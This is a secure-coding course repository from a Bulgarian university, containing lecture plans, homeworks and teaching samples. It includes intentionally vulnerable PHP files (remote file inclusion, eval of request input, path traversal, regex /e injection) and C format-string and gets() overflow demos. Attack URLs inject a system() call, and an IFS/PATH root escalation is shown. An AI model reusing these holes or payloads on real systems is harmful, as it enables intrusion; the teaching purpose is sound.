├── lecture-plans
    ├── crypto-security.txt
    ├── iOS-security.txt
    ├── android-security.txt
    ├── windows-security.txt
    ├── defensive-programming.txt
    ├── php-security
    │   ├── attack
    │   │   ├── .htaccess
    │   │   └── functions.php
    │   ├── file-inclusion.php
    │   ├── functions.php
    │   ├── code-evaluation.php
    │   ├── path-traversal.php
    │   ├── arr.php
    │   ├── users
    │   ├── executing-the-attacks.txt
    │   └── re-injection.php
    ├── vk
    │   ├── img
    │   │   ├── endian.png
    │   │   ├── memalloc.png
    │   │   ├── overflow.png
    │   │   ├── cryptoeng.png
    │   │   ├── registers.png
    │   │   ├── setupstack.png
    │   │   ├── stackframe.png
    │   │   ├── stackheap.png
    │   │   ├── returntolibc.png
    │   │   ├── fullstackframe.png
    │   │   └── exploits_of_a_mom.png
    │   ├── makedep.sh
    │   ├── mkimg.sh
    │   ├── Makefile
    │   ├── etxt.php
    │   ├── 00complexity-blog.txt
    │   ├── 10sqlinject-blog.txt
    │   ├── beamercolorthemekrok.sty
    │   ├── beamer.my
    │   ├── 10sqlinject.pandoc
    │   ├── 30crypto.pandoc
    │   ├── 00complexity.pandoc
    │   └── 20arch.pandoc
    ├── misc-security.txt
    ├── race-conditions.txt
    ├── c-sharp-security.txt
    ├── input-validation.txt
    ├── python-security
    │   ├── m2.py
    │   └── umask.py
    ├── scripting-languages.txt
    ├── php-security.pandoc
    ├── java-security
    │   └── java-bytecode-injection.txt
    ├── bash-security.txt
    ├── intro.txt
    ├── java-security.txt
    ├── perl-security.txt
    ├── ruby-security.txt
    ├── js-security.txt
    ├── types-of-attacks.txt
    ├── unix-security.txt
    ├── python-security.txt
    ├── web-security.txt
    └── php-security.txt
├── homeworks
    ├── 01
    │   ├── Makefile
    │   ├── secrets.conf
    │   └── cfg.c
    └── homeworks.txt
├── test-generator
    ├── arial.ttf
    ├── pgdump.sql
    └── generate-test.pl
├── presentations
    ├── javascript.odp
    ├── python
    │   ├── Python_files
    │   │   ├── name_assignment_1.png
    │   │   ├── name_assignment_2.png
    │   │   ├── name_assignment_3.png
    │   │   ├── css.css
    │   │   └── styles.css
    │   └── Python.htm
    ├── ruby
    │   ├── Ruby – особености от гледна точка на сигурността.pdf
    │   └── index.html
    ├── web
    │   ├── Web приложения – особености от гледна точка на сигурността.pdf
    │   └── index.html
    ├── scripting-languages.pandoc
    └── types-of-attacks.pandoc
├── README.md
├── books.txt
├── code
    └── C
    │   ├── format-string.c
    │   ├── stack-protection.c
    │   ├── today.txt
    │   ├── Makefile
    │   ├── elf-normal
    │   └── elf-protected
├── projects
    ├── hackman.md
    └── vk.md
├── useful-links.txt
├── annotation.txt
└── course-plan.txt


/lecture-plans/crypto-security.txt:
--------------------------------------------------------------------------------
1 | Crypto :)
2 | 


--------------------------------------------------------------------------------
/lecture-plans/iOS-security.txt:
--------------------------------------------------------------------------------
1 | To be discussed
2 | 


--------------------------------------------------------------------------------
/lecture-plans/android-security.txt:
--------------------------------------------------------------------------------
1 | To be discussed
2 | 


--------------------------------------------------------------------------------
/lecture-plans/windows-security.txt:
--------------------------------------------------------------------------------
1 | To be discussed
2 | 


--------------------------------------------------------------------------------
/lecture-plans/defensive-programming.txt:
--------------------------------------------------------------------------------
1 | To be discussed
2 | 


--------------------------------------------------------------------------------
/lecture-plans/php-security/attack/.htaccess:
--------------------------------------------------------------------------------
1 | AddHandler text/plain .php
2 | 


--------------------------------------------------------------------------------
/homeworks/01/Makefile:
--------------------------------------------------------------------------------
1 | all: cfg
2 | 
3 | cfg: cfg.c
4 | 	gcc -g -Wall -o cfg $<
5 | 


--------------------------------------------------------------------------------
/test-generator/arial.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/test-generator/arial.ttf


--------------------------------------------------------------------------------
/presentations/javascript.odp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/presentations/javascript.odp


--------------------------------------------------------------------------------
/lecture-plans/vk/img/endian.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/endian.png


--------------------------------------------------------------------------------
/lecture-plans/misc-security.txt:
--------------------------------------------------------------------------------
1 | - Packet in packet injection (ManiaX)
2 | - Return oriented programming
3 | - ???
4 | 


--------------------------------------------------------------------------------
/lecture-plans/php-security/attack/functions.php:
--------------------------------------------------------------------------------
1 | <?php
2 | echo("HackMan was here...<br />\nNot bad...<br />\n");
3 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/img/memalloc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/memalloc.png


--------------------------------------------------------------------------------
/lecture-plans/vk/img/overflow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/overflow.png


--------------------------------------------------------------------------------
/lecture-plans/vk/img/cryptoeng.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/cryptoeng.png


--------------------------------------------------------------------------------
/lecture-plans/vk/img/registers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/registers.png


--------------------------------------------------------------------------------
/lecture-plans/vk/img/setupstack.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/setupstack.png


--------------------------------------------------------------------------------
/lecture-plans/vk/img/stackframe.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/stackframe.png


--------------------------------------------------------------------------------
/lecture-plans/vk/img/stackheap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/stackheap.png


--------------------------------------------------------------------------------
/lecture-plans/vk/img/returntolibc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/returntolibc.png


--------------------------------------------------------------------------------
/lecture-plans/vk/img/fullstackframe.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/fullstackframe.png


--------------------------------------------------------------------------------
/lecture-plans/vk/img/exploits_of_a_mom.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/lecture-plans/vk/img/exploits_of_a_mom.png


--------------------------------------------------------------------------------
/lecture-plans/race-conditions.txt:
--------------------------------------------------------------------------------
1 | - Race conditions
2 |   - non re-entrent functions (DB, Shared mem, files)
3 |   - mutex/spinlock/RCU
4 | 


--------------------------------------------------------------------------------
/lecture-plans/c-sharp-security.txt:
--------------------------------------------------------------------------------
1 |   - SQL
2 |   - Shell
3 |   - Code
4 |   - Hash implementation(collisions)
5 |   - general language issues
6 | 


--------------------------------------------------------------------------------
/lecture-plans/input-validation.txt:
--------------------------------------------------------------------------------
1 | - Input validation 
2 |   - Protocol complexity(state machine, turing complete)
3 |   - Environment
4 |   - Direct input
5 | 


--------------------------------------------------------------------------------
/presentations/python/Python_files/name_assignment_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/presentations/python/Python_files/name_assignment_1.png


--------------------------------------------------------------------------------
/presentations/python/Python_files/name_assignment_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/presentations/python/Python_files/name_assignment_2.png


--------------------------------------------------------------------------------
/presentations/python/Python_files/name_assignment_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/presentations/python/Python_files/name_assignment_3.png


--------------------------------------------------------------------------------
/lecture-plans/php-security/file-inclusion.php:
--------------------------------------------------------------------------------
1 | <?php
2 |         $path=$_GET['path'];
3 |         include($path.'functions.php');
4 |         echo("Pure test");
5 | ?>
6 | 


--------------------------------------------------------------------------------
/lecture-plans/python-security/m2.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | 
3 | import os
4 | import sys
5 | 
6 | fh1 = os.open ("py-0333-3", os.O_CREAT, 0777)
7 | 
8 | os.close(fh1)
9 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Information about the Network Security II (secure coding) course at FMI Sofia.
2 | 
3 | All course materials can be found here: http://training.iseca.org
4 | 
5 | 
6 | 


--------------------------------------------------------------------------------
/presentations/ruby/Ruby – особености от гледна точка на сигурността.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/presentations/ruby/Ruby – особености от гледна точка на сигурността.pdf


--------------------------------------------------------------------------------
/lecture-plans/vk/makedep.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | for i in *.pandoc; do
4 | 	pdfn=`echo $i|sed s/\.pandoc$/.pdf/`
5 | 	echo $pdfn: `grep '^!' "$i"|cut -d \( -f 2|cut -d \) -f 1|sort|uniq `
6 | done
7 | 


--------------------------------------------------------------------------------
/presentations/web/Web приложения – особености от гледна точка на сигурността.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackman/netsec2/HEAD/presentations/web/Web приложения – особености от гледна точка на сигурността.pdf


--------------------------------------------------------------------------------
/lecture-plans/php-security/functions.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | echo("functions.php<br />\n");
 3 | 
 4 | function test1($var1, $var2) {
 5 | 	echo("$var1, $var2\n");
 6 | }
 7 | 
 8 | test1($argv[1], $argv[2], $argv[3]);
 9 | 
10 | 


--------------------------------------------------------------------------------
/lecture-plans/php-security/code-evaluation.php:
--------------------------------------------------------------------------------
1 | <?php
2 |         $path='./';
3 |         include($path.'functions.php');
4 |         $x = $_GET['arg']; 
5 |         eval($x);
6 |         echo("Pure test<br />\nX: $x");
7 | ?>
8 | 


--------------------------------------------------------------------------------
/lecture-plans/php-security/path-traversal.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $template = 'blue.php';
3 | if ( is_set( $_COOKIE['TEMPLATE'] ) )
4 |    $template = $_COOKIE['TEMPLATE'];
5 | include ( "/home/users/phpguru/templates/" . $template );
6 | ?>
7 | 


--------------------------------------------------------------------------------
/lecture-plans/php-security/arr.php:
--------------------------------------------------------------------------------
 1 | <?php 
 2 | function abc() {
 3 | 	$arr['0.0'] = 0.0;
 4 | 	$arr[2] = 2;
 5 | 	$arr[1] = 1;
 6 | 	$arr[0] = 0;
 7 | 	foreach ($arr as $elem) { echo "$elem "; } // prints "2 1 0" !!
 8 | 	echo("\n");
 9 | }
10 | abc($argv[0]);
11 | 


--------------------------------------------------------------------------------
/lecture-plans/php-security/users:
--------------------------------------------------------------------------------
1 | bfstxe4u:pass1:1827:1822::/home/bfstxe4u:/bin/bash
2 | terminus:pass1:1828:1823::/home/terminus:/bin/bash
3 | freerred:pass1:1829:1824::/home/freerred:/bin/bash
4 | kareent0:pass1:1830:1825::/home/kareent0:/bin/bash
5 | dbmfair8:pass1:1831:1826::/home/dbmfair8:/bin/bash
6 | 


--------------------------------------------------------------------------------
/books.txt:
--------------------------------------------------------------------------------
 1 | Books that are related to the things we discuss in this course:
 2 | 
 3 |   The Art of Software Security Assesment
 4 |   Maximum Security
 5 |   Hacking Exposed *
 6 |   Security Warrior
 7 |   Secure Programming Cookbook for C and C++
 8 |   The CERT C Codding Standard
 9 |   Reverse engineering for beginners (http://beginners.re)
10 | 


--------------------------------------------------------------------------------
/homeworks/01/secrets.conf:
--------------------------------------------------------------------------------
 1 | pass1=dsadaq13g22134fJLKKOPKJLEPOEDJQWMLDQPODQIQDNMKJLQWM:LDOKPQP!io1;adef1
 2 | pass2=213rew98fpdsliufq
 3 | pass3=dfqofskja
 4 | pass4=pqgt8489ofs
 5 | pass5=78341iurkjfd*&)^GOBALkdsoa8fiuqlnrmgas(*&IYKJlddddeLL
 6 | pass6=4301978q6sdyugafk	n43m1-9m20odaislf2.3^
 7 | pass7=179ioL>!HOL:LDpl
 8 | pass8=lvqfqebwf1dm2l8<tl deow
 9 | pass9=45678999ijhgfertyuiuoiki89u7iuopkoo,lOUIYUFDRIYUIoupi1^&*(
10 | 


--------------------------------------------------------------------------------
/lecture-plans/scripting-languages.txt:
--------------------------------------------------------------------------------
 1 | General Issues of the scripting languages
 2 | - DoS caused by the way they are executed
 3 | - Interpreter problems
 4 |   - bad implementations 
 5 |   - memory leaks, causing DoS
 6 |   - faulty implementation of system functions
 7 |   - bad handling of environment variables (bad environment sanitation)
 8 |   - bad designs (register_globals)
 9 | - Awkward and rarely understood language specifics
10 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/mkimg.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | img=$1
 4 | 
 5 | geom=`identify -quiet -format '%G' img/$img`
 6 | width=`echo $geom |cut -d x -f 1`
 7 | height=`echo $geom |cut -d x -f 2`
 8 | 
 9 | wantedwidth=`echo -e "scale=0\n$height"'*'"1.4"|bc|cut -d . -f 1`
10 | 
11 | if [ $width -gt $wantedwidth ]; then
12 | 	cp "img/$img" "$img"
13 | else
14 | 	convert "img/$img" -gravity center -extent ${wantedwidth}x${height} "$img"
15 | fi
16 | 


--------------------------------------------------------------------------------
/lecture-plans/php-security.pandoc:
--------------------------------------------------------------------------------
 1 | % PHP language
 2 | % 
 3 | 
 4 | # Configuration
 5 | 
 6 | * build issues
 7 | * configuration handling
 8 | 
 9 | 
10 | 
11 | # Configuration
12 | * configuration handling
13 |   - php.ini
14 |   - scan dir
15 |   - local .ini files
16 |   - ini_set/ini_alter/ini_restore
17 |   - Apache related
18 | 
19 | 	php_value name value 
20 | 	php_flag name on|off 
21 | 	php_admin_value name value 
22 | 	php_admin_flag name on|off
23 | 


--------------------------------------------------------------------------------
/code/C/format-string.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <stdlib.h>
 4 | 
 5 | int main (int argc, char **argv) {
 6 | 	char buf[10] = { '\0' };
 7 | 	int x = 1; 
 8 | 
 9 | //	snprintf(buf, sizeof(buf), "%s", argv[1]);	// here is a simple fix
10 | 
11 | 	snprintf(buf, sizeof(buf), argv[1]);		// the actual exploit
12 | 	buf[sizeof(buf)-1] = 0;
13 | 	printf("Buffer size is: (%d) \nData input: %s \n", strlen(buf), buf);
14 | 	printf("in hex: %#x\nMemory address for x: (%p) \n", x, &x);
15 | 	strdup(argv[1]);
16 | 	return 0;
17 | }
18 | 


--------------------------------------------------------------------------------
/code/C/stack-protection.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <alloca.h>
 3 | // this disables "warning: implicit declaration of function 'gets'"
 4 | #pragma GCC diagnostic ignored "-Wimplicit-function-declaration"
 5 | 
 6 | //void __attribute__ ((stack_protect)) fun() {
 7 | void fun() {
 8 | 	char *buf = alloca(0x100);
 9 | 	/* Don't allow gcc to optimise away the buf */
10 | 	asm volatile("" :: "m" (buf));
11 | }
12 | 
13 | void user_read() {
14 |         char buffer[28];
15 |         gets(buffer);
16 | }
17 | 
18 | int main(void) {
19 |         user_read();
20 | }
21 | 
22 | 


--------------------------------------------------------------------------------
/lecture-plans/php-security/executing-the-attacks.txt:
--------------------------------------------------------------------------------
 1 | File inclusion:
 2 | expected:
 3 |   http://papers.yuhu.biz/netsec2/file-inclusion.php
 4 | url include:
 5 |   http://papers.yuhu.biz/netsec2/file-inclusion.php?path=http://papers.yuhu.biz/netsec2/attack/
 6 | path modification:
 7 |   http://papers.yuhu.biz/netsec2/file-inclusion.php?path=attack/
 8 | 
 9 | Code inclustion:
10 |   http://papers.yuhu.biz/netsec2/code-evaluation.php?arg=echo%20OK;
11 | 
12 | Regular Expression Inclusion
13 |   http://papers.yuhu.biz/netsec2/re-injection.php?username=terminus&password=pass1&newpassword=%27.system%28%27ls%20-l%27%29.%27
14 | 


--------------------------------------------------------------------------------
/lecture-plans/python-security/umask.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import os
 4 | import sys
 5 | 
 6 | test_file = "netsec1.junk"
 7 | my_mask = 777
 8 | args = len(sys.argv)
 9 | 
10 | if args > 3:
11 |     test_file = sys.argv[1]
12 |     perms = int(sys.argv[2])
13 |     mask = sys.argv[3]
14 |     old_mask = os.umask (mask)
15 |     fh1 = os.open (test_file, os.O_CREAT, perms)
16 | elif args > 2:
17 |     test_file = sys.argv[1]
18 |     perms = int(sys.argv[2])
19 |     fh1 = os.open (test_file, os.O_CREAT, perms)
20 | elif args > 1:
21 |     test_file = sys.argv[1]
22 |     fh1 = os.open (test_file, os.O_CREAT)
23 | else:
24 |     fh1 = os.open (test_file, os.O_CREAT)
25 | 
26 | os.close(fh1)
27 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/Makefile:
--------------------------------------------------------------------------------
 1 | 
 2 | TARGETS=$(patsubst %.pandoc,%.pdf,$(wildcard *.pandoc)) $(patsubst %.pandoc,%-blog.txt,$(wildcard *.pandoc))
 3 | 
 4 | all: depend $(TARGETS)
 5 | 
 6 | depend: .depend
 7 | 
 8 | .depend: $(wildcard *.pandoc) makedep.sh
 9 | 	rm -f .depend
10 | 	./makedep.sh > .depend
11 | 
12 | -include .depend
13 | 
14 | %.pdf: %.pandoc beamer.my beamercolorthemekrok.sty
15 | 	pandoc --slide-level 3 -t beamer $< --template beamer.my -V theme:Warsaw -V fonttheme:structurebold -V colortheme:krok -o $@
16 | 
17 | %.png: img/%.png
18 | 	./mkimg.sh $@
19 | 
20 | %-blog.txt: %.pandoc
21 | 	php etxt.php $< > $@
22 | clean:
23 | 	rm -f $(TARGETS) *.png .depend
24 | 
25 | push:
26 | 	git push origin master
27 | 


--------------------------------------------------------------------------------
/lecture-plans/php-security/re-injection.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | // Regular Expression Injection attack: http://hauser-wenz.de/playground/papers/RegExInjection.pdf
 3 | // input: $username, $password, $newpassword
 4 | // e.g.:
 5 | $username = (isset($_GET['username'])) ? $_GET['username'] : '';
 6 | $password = (isset($_GET['password'])) ? $_GET['password'] : '';
 7 | $newpassword = (isset($_GET['newpassword'])) ? $_GET['newpassword'] : '';
 8 | echo("New pass: $newpassword<br />\n\n");
 9 | $users = file_get_contents('users');
10 | $users = preg_replace("/($username):$password(:.*)/e", "'\\1:'.strtolower('$newpassword').'\\2'", $users );
11 | $users = preg_replace("#[\r\n]+#", "<br />\n", $users, -1 );
12 | echo($users);
13 | ?>
14 | 


--------------------------------------------------------------------------------
/lecture-plans/java-security/java-bytecode-injection.txt:
--------------------------------------------------------------------------------
 1 | Java code compiles into bytecode (Foo.java ->> Foo.class). Bytecode injection is modifying Foo.classat runtime to inject code into it right before its loaded and run.
 2 | 
 3 | Imagine a scenario where I want to find out how many times method
 4 | 
 5 | public void bar();
 6 | 
 7 | is invoked in Foo.class. I could write an agent using java.lang.instrument that intercepts Foo.class during class load, modifies it using ASM so that bar() calls com.amir.agent.incrementCount() on method entry.
 8 | 
 9 | Now I can run my program:
10 | 
11 | $java -javagent:MyAgent Foo  //assuming Foo has a main() defined
12 | 
13 | and at runtime, Foo.class will not only do its normal work, it will also do work I defined in MyAgent each time bar() is invoked.
14 | 


--------------------------------------------------------------------------------
/projects/hackman.md:
--------------------------------------------------------------------------------
 1 | # Проекти от Мариян (HackMan) Маринов
 2 | =====================================
 3 | 
 4 | 
 5 | # Анализи 
 6 | ## Анализ на проблемите в сигурността на Linux ядрото в последните 12 месеца (6/10, двама души)
 7 | 1. Списък на проблемите в сигурността на Linux ядрото в последните 12 месеца.
 8 | 2. Описание на всички проблеми довели до ситуации, в които локален потребител може да вземе root привилегии.
 9 | 3. Приоритизиране на всички проблеми които водят до потенциален DoS
10 | 4. Статистически анализ на времето за излизане на exploit за намерените проблеми
11 | 5. Статистически анализ на времето за решаване на намерените проблеми
12 | 6. Направете анализ, теоретично, колко време след обявяването на критичен проблем в сигурността на ядрото е възможно машина да бъде компрометирана(exploited) и колко е вероятно това да се случи.
13 | 


--------------------------------------------------------------------------------
/homeworks/homeworks.txt:
--------------------------------------------------------------------------------
 1 | Homeworks for this course are ongoing...
 2 | You can submit PoC(Proof-of-Concept) exploits as soon as you have them.
 3 | 
 4 | The task is simple, find security issues within the following software:
 5 | - Moodle
 6 | - Joomla
 7 | - WordPress
 8 | - FFmpeg/AVconv (they are pretty close)
 9 | - Linux Kernel
10 | 
11 | Every proven security issue is eligible for 1 to 3 points.
12 | 
13 | If you have worked on any other opensource software and have reported a software security issue to them or want to work on auditing that code, please first consult with the teachers of the course.
14 | 
15 | 
16 | 01 Compiled languages
17 | You have one config parser, which parses secrets.conf into keys and values.
18 |  - find out why you need the FIX define
19 |  - find out why you don't see pass5, pass6, pass7 and pass9
20 |  - explain how you solved both issues and how you found the actual problems
21 | 


--------------------------------------------------------------------------------
/useful-links.txt:
--------------------------------------------------------------------------------
 1 | http://www.dwheeler.com/secure-programs/
 2 | http://arstechnica.com/cpu/index.html
 3 | http://www.php.net/manual/en/security.php
 4 | http://www.securereality.com.au/studyinscarlet.txt
 5 | http://www.perldoc.com/perl5.6/pod/perlsec.html
 6 | http://www.insecure.org/news/P55-07.txt
 7 | http://www.securiteam.com/securityreviews/5DP0N1P76E.html
 8 | http://www.owasp.org/asac/input_validation/sql.shtml
 9 | http://www.cs.columbia.edu/~akonstan/presentations/java-security/html/
10 | http://msdn.microsoft.com/library/default.asp?url=/nhp/Default.asp?contentid=28001369
11 | http://msdn.microsoft.com/vstudio/techinfo/articles/developerproductivity/frameworksec.asp
12 | 
13 | http://guides.rubyonrails.org/security.html
14 | http://php.net/manual/en/security.php
15 | http://treinamentoinfoco.com.br/wp-content/uploads/2014/01/PHP.Architectnanobooks.PHP_.Architects.Guide_.to_.PHP_.Security.2005.LotB_.pdf
16 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/etxt.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | if ($argc!=2) {
 4 | 	echo "Usage: {$argv[0]} filename\n";
 5 | 	exit(2);
 6 | }
 7 | 
 8 | define("ST_OUT", 1);
 9 | define("ST_IN", 2);
10 | 
11 | $fp = fopen($argv[1],"r");
12 | 
13 | $state=ST_OUT;
14 | $slide=1;
15 | $slidetitle="title";
16 | 
17 | while (!feof($fp)) {
18 | 	$row = fgets($fp);
19 | 	if ($row === false) break;
20 | 
21 | //	echo "DBG: st:$state sl:$slide  $row";
22 | 
23 | 	if ($state==ST_OUT) {
24 | 		if ($row[0] == '#') {
25 | 			$slidetitle = preg_replace('/^[# ]*/','', $row);
26 | 			$slidetitle = str_replace(array("\n", "\r"), '', $slidetitle);
27 | 			$slide++;
28 | 			continue;
29 | 		}
30 | 		if (strncmp($row, "<!--", 4)==0) {
31 | 			echo "[slide $slide $slidetitle]\n\n";
32 | 			$state=ST_IN;
33 | 			continue;
34 | 		} 
35 | 
36 | 	} else if ($state==ST_IN) {
37 | 		if (strncmp($row, "-->", 3)==0) {
38 | 			$state=ST_OUT;
39 | 			echo "\n";
40 | 			continue;
41 | 		} 
42 | 		echo $row;
43 | 	} 
44 | 	
45 | }
46 | 
47 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/00complexity-blog.txt:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | if ($argc!=2) {
 4 | 	echo "Usage: {$argv[0]} filename\n";
 5 | 	exit(2);
 6 | }
 7 | 
 8 | define("ST_OUT", 1);
 9 | define("ST_IN", 2);
10 | 
11 | $fp = fopen($argv[1],"r");
12 | 
13 | $state=ST_OUT;
14 | $slide=1;
15 | $slidetitle="title";
16 | 
17 | while (!feof($fp)) {
18 | 	$row = fgets($fp);
19 | 	if ($row === false) break;
20 | 
21 | //	echo "DBG: st:$state sl:$slide  $row";
22 | 
23 | 	if ($state==ST_OUT) {
24 | 		if ($row[0] == '#') {
25 | 			$slidetitle = preg_replace('/^[# ]*/','', $row);
26 | 			$slidetitle = str_replace(array("\n", "\r"), '', $slidetitle);
27 | 			$slide++;
28 | 			continue;
29 | 		}
30 | 		if (strncmp($row, "<!--", 4)==0) {
31 | 			echo "[slide $slide $slidetitle]\n\n";
32 | 			$state=ST_IN;
33 | 			continue;
34 | 		} 
35 | 
36 | 	} else if ($state==ST_IN) {
37 | 		if (strncmp($row, "-->", 3)==0) {
38 | 			$state=ST_OUT;
39 | 			echo "\n";
40 | 			continue;
41 | 		} 
42 | 		echo $row;
43 | 	} 
44 | 	
45 | }
46 | 
47 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/10sqlinject-blog.txt:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | if ($argc!=2) {
 4 | 	echo "Usage: {$argv[0]} filename\n";
 5 | 	exit(2);
 6 | }
 7 | 
 8 | define("ST_OUT", 1);
 9 | define("ST_IN", 2);
10 | 
11 | $fp = fopen($argv[1],"r");
12 | 
13 | $state=ST_OUT;
14 | $slide=1;
15 | $slidetitle="title";
16 | 
17 | while (!feof($fp)) {
18 | 	$row = fgets($fp);
19 | 	if ($row === false) break;
20 | 
21 | //	echo "DBG: st:$state sl:$slide  $row";
22 | 
23 | 	if ($state==ST_OUT) {
24 | 		if ($row[0] == '#') {
25 | 			$slidetitle = preg_replace('/^[# ]*/','', $row);
26 | 			$slidetitle = str_replace(array("\n", "\r"), '', $slidetitle);
27 | 			$slide++;
28 | 			continue;
29 | 		}
30 | 		if (strncmp($row, "<!--", 4)==0) {
31 | 			echo "[slide $slide $slidetitle]\n\n";
32 | 			$state=ST_IN;
33 | 			continue;
34 | 		} 
35 | 
36 | 	} else if ($state==ST_IN) {
37 | 		if (strncmp($row, "-->", 3)==0) {
38 | 			$state=ST_OUT;
39 | 			echo "\n";
40 | 			continue;
41 | 		} 
42 | 		echo $row;
43 | 	} 
44 | 	
45 | }
46 | 
47 | 


--------------------------------------------------------------------------------
/annotation.txt:
--------------------------------------------------------------------------------
 1 | Целта на курса е да запознае студентите с различните концепции за сигурно програмиране.
 2 | Ще бъдат разгледани и демонстрирани атаки върху несигурен код, както и широк клас защити от такива атаки. 
 3 | Курсът е естествено продължение на "Мрежова сигурност I" и е ориентиран основно към разработчиците на софтуер.
 4 | 
 5 | Програмата на курса можете да видите тук:
 6 |   https://github.com/hackman/netsec2/blob/master/course-plan.txt
 7 | 
 8 | Оценяването става с едно или две контролнои и курсов проект.
 9 | 
10 | 	Точки		Оценка
11 | 	60-69 		3
12 | 	70-79		4
13 | 	80-89		5
14 | 	90-100		6
15 | 
16 | Темите за курсовите проекти могат да бъдат намерени тук:
17 |   https://github.com/hackman/netsec2/tree/master/projects
18 | 
19 | С цел добиване на допълнителни точки(извън тези които ще получите от контролните и курсовият проект) можете да се опитате да направите и някоя от задачите за домашна работа:
20 |   https://github.com/hackman/netsec2/blob/master/homeworks.txt
21 | 
22 | 
23 | Интересни материали по темите обсъждани в този курс можете да намерите в допълнителната литература:
24 |   https://github.com/hackman/netsec2/blob/master/books.txt
25 | 
26 | 


--------------------------------------------------------------------------------
/projects/vk.md:
--------------------------------------------------------------------------------
 1 | # Проекти от Васил Колев (и предишни години)
 2 | ==========================================
 3 | 
 4 | # Курсови проекти
 5 | 
 6 | ## Exploit/code exec
 7 | 
 8 | Да се напише code execution exploit за един от следните софтуери, който да работи на
 9 | Debian Wheezy:
10 | vlc 2.0.3-5
11 | privoxy 3.0.19-2
12 | polarssl-1.2.9-deb6u1
13 | 
14 | ## Exploit за работеща услуга
15 | 
16 | Да се напише програма, която чрез MITM да прихваща и анализира информация (вкл.
17 | credentials) за следните услуги:
18 | 
19 | Facebook
20 | GMail
21 | СУСИ
22 | Twitter
23 | 
24 | Версиите на софтуера може да се намерят на https://vasil.ludost.net/ns/
25 | 
26 | ## Audit на код
27 | 
28 | Да се прегледа кода на един от следните софтуери и да се опишат откритите проблеми
29 | и методологията:
30 | 
31 | Moodle plugin някой-си;
32 | 
33 | 
34 | 
35 | # Проекти за точки през семестъра
36 | 
37 | ## Откриване на нов security проблем в софтуер:
38 | 
39 | Да се открие нов (неизвестен досега) security проблем в един от следните софтуери
40 | и да се report-не на разработчиците по нормалната процедура за софтуера:
41 | 
42 | WordPress 4.1
43 | Moodle 2.8.3
44 | 
45 | Студентите ще трябва да покажат комуникацията с проекта и да опишат проблема.
46 | 
47 | 
48 | 


--------------------------------------------------------------------------------
/lecture-plans/bash-security.txt:
--------------------------------------------------------------------------------
 1 | Arrays and Hashes
 2 | 
 3 | abuse of PATH
 4 | $ program
 5 | instead of
 6 | $ ./program
 7 | 
 8 | abuse of IFS
 9 | 1) 	$ cat /home/nick/bin
10 | 2) 	...#!/bin/bash
11 | 3) 	.../bin/sh #this script will execute /bin/sh
12 | 4) 	$ ls -al /usr/local/date
13 | 5) 	---s--x--x 1 root root 21673 Mar 9 18:36 date
14 | 6) 	$ PATH=/home/nick:${PATH}
15 | 7) 	$ export PATH
16 | 8) 	$ IFS=/
17 | 9) 	$ export IFS
18 | 10) 	$ /usr/local/date
19 | 11) 	# whoami
20 | 12) 	root
21 | 
22 | IFS exploits:
23 | 	http://www.securityfocus.com/bid/454/exploit
24 | 	http://seclists.org/bugtraq/1996/Jun/82
25 | 
26 | Executing applications:
27 | 
28 | 	`cmd`
29 | 	$(cmd)
30 | 	exec cmd
31 | 	/bin/bash cmd
32 | 
33 | Subshells:
34 | user=111
35 | uid=12
36 | cut -d : -f 1,3,4 /etc/passwd|tr ':' ' '|while read user uid gid; do
37 | 	echo "|$user|$uid|$gid|"
38 | done|tail -n5
39 | 
40 | 	/bin/bash (cut)
41 | 		 \- /bin/bash (tr)
42 | 			     \- /bin/bash (while)
43 | 
44 | 
45 | Running bash in restricted mode:	http://linux.die.net/man/1/bash
